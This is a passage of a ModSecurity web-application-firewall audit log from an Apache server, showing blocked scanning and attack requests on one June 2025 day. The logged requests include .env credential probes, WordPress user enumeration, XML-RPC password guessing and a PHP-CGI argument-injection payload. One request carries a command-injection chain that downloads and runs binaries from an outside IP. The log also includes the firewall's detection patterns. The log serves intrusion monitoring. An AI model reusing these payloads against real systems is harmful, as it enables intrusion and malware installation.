Chrome/86.0.4240.198 Safari/537.36 --09cca70c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --09cca70c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749531527730046 3292 (- - -) Stopwatch2: 1749531527730046 3292; combined=1436, p1=505, p2=900, p3=0, p4=0, p5=31, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09cca70c-Z-- --4971d03e-A-- [10/Jun/2025:12:22:19 +0700] aEfBCzQZgo88hy0TiYz8awAAAEc 103.236.140.4 45070 103.236.140.4 8181 --4971d03e-B-- GET /protected/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36 Accept-Charset: utf-8 --4971d03e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4971d03e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749532939322263 922 (- - -) Stopwatch2: 1749532939322263 922; combined=370, p1=318, p2=0, p3=0, p4=0, p5=52, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4971d03e-Z-- --18a2a005-A-- [10/Jun/2025:12:27:40 +0700] aEfCTGkffiosQXBbxVZWnwAAANE 103.236.140.4 45152 103.236.140.4 8181 --18a2a005-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 206.189.225.181 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 206.189.225.181 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --18a2a005-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --18a2a005-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749533260939875 770 (- - -) Stopwatch2: 1749533260939875 770; combined=305, p1=274, p2=0, p3=0, p4=0, p5=31, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18a2a005-Z-- --092f6669-A-- [10/Jun/2025:12:59:16 +0700] aEfJtDQZgo88hy0TiYwBLwAAAE4 103.236.140.4 33954 103.236.140.4 8181 --092f6669-B-- POST /xmlrpc.php HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 74.94.91.129 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 74.94.91.129 X-Forwarded-Proto: http Connection: close Content-Length: 187 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: */* Accept-Charset: utf-8 Accept-Language: en-US,en;q=0.5 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Pragma: no-cache --092f6669-C-- wp.getUsersBlogsadmin12345 --092f6669-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --092f6669-E-- --092f6669-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 74.94.91.129 (+1 hits since last alert)|103.236.140.4|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749535156475826 4284 (- - -) Stopwatch2: 1749535156475826 4284; combined=3341, p1=360, p2=2772, p3=0, p4=0, p5=124, sr=75, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --092f6669-Z-- --29a8ba5f-A-- [10/Jun/2025:12:59:23 +0700] aEfJu2QJEkWdvAT5oU6n5AAAAAk 103.236.140.4 34000 103.236.140.4 8181 --29a8ba5f-B-- POST /xmlrpc.php HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 74.94.91.129 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 74.94.91.129 X-Forwarded-Proto: http Connection: close Content-Length: 190 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: */* Accept-Charset: utf-8 Accept-Language: en-US,en;q=0.5 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Pragma: no-cache --29a8ba5f-C-- wp.getUsersBlogsadmin!@#$%^&* --29a8ba5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --29a8ba5f-E-- --29a8ba5f-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||103.236.140.4|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749535163236592 5058 (- - -) Stopwatch2: 1749535163236592 5058; combined=3696, p1=426, p2=3051, p3=0, p4=0, p5=151, sr=73, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29a8ba5f-Z-- --a78b2551-A-- [10/Jun/2025:12:59:32 +0700] aEfJxGQJEkWdvAT5oU6n9QAAABU 103.236.140.4 34064 103.236.140.4 8181 --a78b2551-B-- POST /xmlrpc.php HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 74.94.91.129 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 74.94.91.129 X-Forwarded-Proto: https Connection: close Content-Length: 190 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: */* Accept-Charset: utf-8 Accept-Language: en-US,en;q=0.5 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Pragma: no-cache --a78b2551-C-- wp.getUsersBlogsadmin!@#$%^&* --a78b2551-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a78b2551-E-- --a78b2551-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||103.236.140.4|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749535172887655 4203 (- - -) Stopwatch2: 1749535172887655 4203; combined=3326, p1=342, p2=2821, p3=0, p4=0, p5=96, sr=76, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a78b2551-Z-- --a658b738-A-- [10/Jun/2025:13:00:16 +0700] aEfJ8JSz29O8wd7wtMvQrwAAAJI 103.236.140.4 34292 103.236.140.4 8181 --a658b738-B-- POST /xmlrpc.php HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 74.94.91.129 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 74.94.91.129 X-Forwarded-Proto: https Connection: close Content-Length: 190 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: */* Accept-Charset: utf-8 Accept-Language: en-US,en;q=0.5 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Pragma: no-cache --a658b738-C-- wp.getUsersBlogsadminBlahblah --a658b738-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a658b738-E-- --a658b738-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 74.94.91.129 (166+1 hits since last alert)|103.236.140.4|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749535216588191 6086 (- - -) Stopwatch2: 1749535216588191 6086; combined=4206, p1=505, p2=3521, p3=0, p4=0, p5=108, sr=95, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a658b738-Z-- --385ad568-A-- [10/Jun/2025:13:03:05 +0700] aEfKmWkffiosQXBbxVZakAAAAMw 103.236.140.4 34394 103.236.140.4 8181 --385ad568-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --385ad568-C-- --385ad568-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --385ad568-E-- --385ad568-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749535385358365 3775 (- - -) Stopwatch2: 1749535385358365 3775; combined=2042, p1=457, p2=1543, p3=0, p4=0, p5=42, sr=80, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --385ad568-Z-- --40840d34-A-- [10/Jun/2025:13:28:35 +0700] aEfQkzQZgo88hy0TiYwBzQAAAFU 103.236.140.4 36542 103.236.140.4 8181 --40840d34-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 154.72.66.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.72.66.238 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --40840d34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40840d34-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749536915280076 2086 (- - -) Stopwatch2: 1749536915280076 2086; combined=1060, p1=352, p2=682, p3=0, p4=0, p5=26, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40840d34-Z-- --7a0a5d00-A-- [10/Jun/2025:13:29:56 +0700] aEfQ5GkffiosQXBbxVZcOQAAANM 103.236.140.4 36720 103.236.140.4 8181 --7a0a5d00-B-- GET /images/stories/admin-post.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 13.79.243.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 13.79.243.123 X-Forwarded-Proto: http Connection: close --7a0a5d00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a0a5d00-H-- Message: Access denied with code 403 (phase 2). String match ".php" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749536996933987 3242 (- - -) Stopwatch2: 1749536996933987 3242; combined=1283, p1=497, p2=754, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a0a5d00-Z-- --c028be73-A-- [10/Jun/2025:13:43:50 +0700] aEfUJpSz29O8wd7wtMvR8wAAAJM 103.236.140.4 36852 103.236.140.4 8181 --c028be73-B-- GET /cgi-bin/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; moto x4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --c028be73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c028be73-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749537830109900 850 (- - -) Stopwatch2: 1749537830109900 850; combined=363, p1=321, p2=0, p3=0, p4=0, p5=41, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c028be73-Z-- --d1d63c1d-A-- [10/Jun/2025:15:18:41 +0700] aEfqYZSz29O8wd7wtMvdvAAAAJI 103.236.140.4 54188 103.236.140.4 8181 --d1d63c1d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 182.253.123.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.253.123.119 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d1d63c1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1d63c1d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749543521048654 3096 (- - -) Stopwatch2: 1749543521048654 3096; combined=1344, p1=451, p2=858, p3=0, p4=0, p5=35, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1d63c1d-Z-- --e3a72e69-A-- [10/Jun/2025:16:01:56 +0700] aEf0hJSz29O8wd7wtMvd4QAAAJg 103.236.140.4 54726 103.236.140.4 8181 --e3a72e69-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 207.180.223.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 207.180.223.50 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36 Accept-Charset: utf-8 --e3a72e69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e3a72e69-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749546116907742 880 (- - -) Stopwatch2: 1749546116907742 880; combined=328, p1=287, p2=0, p3=0, p4=0, p5=41, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e3a72e69-Z-- --26d19217-A-- [10/Jun/2025:16:06:52 +0700] aEf1rGkffiosQXBbxVZo1wAAANI 103.236.140.4 58014 103.236.140.4 8181 --26d19217-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 184.154.4.187 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 184.154.4.187 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --26d19217-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --26d19217-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749546412219198 2945 (- - -) Stopwatch2: 1749546412219198 2945; combined=1326, p1=452, p2=844, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --26d19217-Z-- --906c9d51-A-- [10/Jun/2025:16:11:35 +0700] aEf2x5Sz29O8wd7wtMvfbAAAAIE 103.236.140.4 35554 103.236.140.4 8181 --906c9d51-B-- GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/x86;chmod+777+*;./x86+x86;cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/arm7;chmod+777+*;./arm7+arm7;cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/arm4;chmod+777+*;./arm4+arm4;cd+/tmp;rm+-rf+j;nohup+wget+http:/\/94.26.90.251/arm5;chmod+777+*;./arm5+arm5 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 141.98.11.147 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 141.98.11.147 X-Forwarded-Proto: http Connection: close Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: en-US,en;q=0.9 --906c9d51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --906c9d51-E-- --906c9d51-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/x86;chmod 777 *;./x86 x86;cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/arm7;chmod 777 *;./arm7 arm7;cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/arm4;chmod 777 *;./arm4 arm4;cd /tmp;rm -rf j;nohup wget http:/\x5c\x5c/94.26.90.251/arm5;chmod 777 *;./arm5 arm5: cd/tmp rm -rf j nohup wget http://94.26.90.251/x86 chmod 777 * ./x86 x86 cd/tmp rm -rf j nohup wget http://94.26.90.251/arm7 chmo..."] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749546695395615 2388 (- - -) Stopwatch2: 1749546695395615 2388; combined=896, p1=468, p2=396, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --906c9d51-Z-- --7bd3976d-A-- [10/Jun/2025:16:23:52 +0700] aEf5qGkffiosQXBbxVZt2QAAAM8 103.236.140.4 50354 103.236.140.4 8181 --7bd3976d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.227.34.246 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.227.34.246 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --7bd3976d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7bd3976d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749547432095082 781 (- - -) Stopwatch2: 1749547432095082 781; combined=339, p1=300, p2=0, p3=0, p4=0, p5=39, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7bd3976d-Z-- --8ea29c3a-A-- [10/Jun/2025:16:50:19 +0700] aEf_22QJEkWdvAT5oU7IVwAAAAU 103.236.140.4 59068 103.236.140.4 8181 --8ea29c3a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; BNTV400 Build/IMM76L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Safari/537.36 Accept-Charset: utf-8 --8ea29c3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ea29c3a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] 